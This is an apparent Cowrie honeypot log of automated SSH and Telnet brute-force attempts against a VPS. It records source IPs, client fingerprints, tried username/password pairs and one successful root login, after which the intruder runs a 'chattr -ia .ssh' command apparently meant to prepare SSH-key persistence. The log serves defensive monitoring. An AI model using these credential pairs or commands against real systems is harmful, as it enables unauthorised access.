{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:57:52.587408Z","src_ip":"199.195.253.95","session":"a221bfbd475f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vpn123","message":"login attempt [admin/vpn123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:57:53.126166Z","src_ip":"199.195.253.95","session":"a221bfbd475f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:57:54.261470Z","src_ip":"199.195.253.95","session":"a221bfbd475f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37104,"dst_ip":"1.2.3.4","dst_port":22,"session":"85a59dc45513","protocol":"ssh","message":"New connection: 212.227.125.160:37104 (1.2.3.4:22) [session: 85a59dc45513]","sensor":"my-vps","timestamp":"2025-08-28T17:57:55.967309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:57:55.975065Z","src_ip":"212.227.125.160","session":"85a59dc45513"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":60374,"dst_ip":"1.2.3.4","dst_port":22,"session":"70ef40ad7eab","protocol":"ssh","message":"New connection: 171.243.150.185:60374 (1.2.3.4:22) [session: 70ef40ad7eab]","sensor":"my-vps","timestamp":"2025-08-28T17:57:56.811548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:57:56.821077Z","src_ip":"171.243.150.185","session":"70ef40ad7eab"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:57:57.054300Z","src_ip":"171.243.150.185","session":"70ef40ad7eab"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:57:57.211173Z","src_ip":"212.227.125.160","session":"85a59dc45513"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:57:58.880255Z","src_ip":"171.243.150.185","session":"70ef40ad7eab"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:58:01.004781Z","src_ip":"171.243.150.185","session":"70ef40ad7eab"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:58:01.298600Z","src_ip":"212.227.125.160","session":"85a59dc45513"}
{"eventid":"cowrie.session.closed","duration":"24.1","message":"Connection lost after 24.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:58:20.106032Z","src_ip":"212.227.125.160","session":"85a59dc45513"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":51364,"dst_ip":"1.2.3.4","dst_port":22,"session":"997494e90c86","protocol":"ssh","message":"New connection: 171.243.150.220:51364 (1.2.3.4:22) [session: 997494e90c86]","sensor":"my-vps","timestamp":"2025-08-28T17:58:23.688582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:58:23.763162Z","src_ip":"171.243.150.220","session":"997494e90c86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50156,"dst_ip":"1.2.3.4","dst_port":23,"session":"65053030ac0e","protocol":"telnet","message":"New connection: 212.227.235.229:50156 (1.2.3.4:23) [session: 65053030ac0e]","sensor":"my-vps","timestamp":"2025-08-28T17:58:32.982727Z"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":44518,"dst_ip":"1.2.3.4","dst_port":22,"session":"bef07f0cad78","protocol":"ssh","message":"New connection: 171.243.150.185:44518 (1.2.3.4:22) [session: bef07f0cad78]","sensor":"my-vps","timestamp":"2025-08-28T17:58:34.915092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:58:34.936956Z","src_ip":"171.243.150.185","session":"bef07f0cad78"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:58:35.113014Z","src_ip":"171.243.150.185","session":"bef07f0cad78"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:58:42.373258Z","src_ip":"171.243.150.185","session":"bef07f0cad78"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:58:43.585588Z","src_ip":"171.243.150.185","session":"bef07f0cad78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41892,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6c4c9c73e86","protocol":"ssh","message":"New connection: 212.227.125.160:41892 (1.2.3.4:22) [session: d6c4c9c73e86]","sensor":"my-vps","timestamp":"2025-08-28T17:59:03.391325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:59:03.650492Z","src_ip":"212.227.125.160","session":"d6c4c9c73e86"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:59:03.714887Z","src_ip":"212.227.125.160","session":"d6c4c9c73e86"}
{"eventid":"cowrie.session.closed","duration":31.439924001693726,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:04.422533Z","src_ip":"212.227.235.229","session":"65053030ac0e"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":41784,"dst_ip":"1.2.3.4","dst_port":22,"session":"be4a3134da71","protocol":"ssh","message":"New connection: 199.195.253.95:41784 (1.2.3.4:22) [session: be4a3134da71]","sensor":"my-vps","timestamp":"2025-08-28T17:59:04.511685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:59:04.521811Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:59:04.639272Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.004542Z","src_ip":"171.243.150.220","session":"997494e90c86"}
{"eventid":"cowrie.login.success","username":"root","password":"126126","message":"login attempt [root/126126] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.084401Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53560,"dst_ip":"1.2.3.4","dst_port":22,"session":"e792983d0f3b","protocol":"ssh","message":"New connection: 212.227.125.160:53560 (1.2.3.4:22) [session: e792983d0f3b]","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.214053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.257147Z","src_ip":"212.227.125.160","session":"e792983d0f3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:59:05.305712Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.306364Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.307549Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
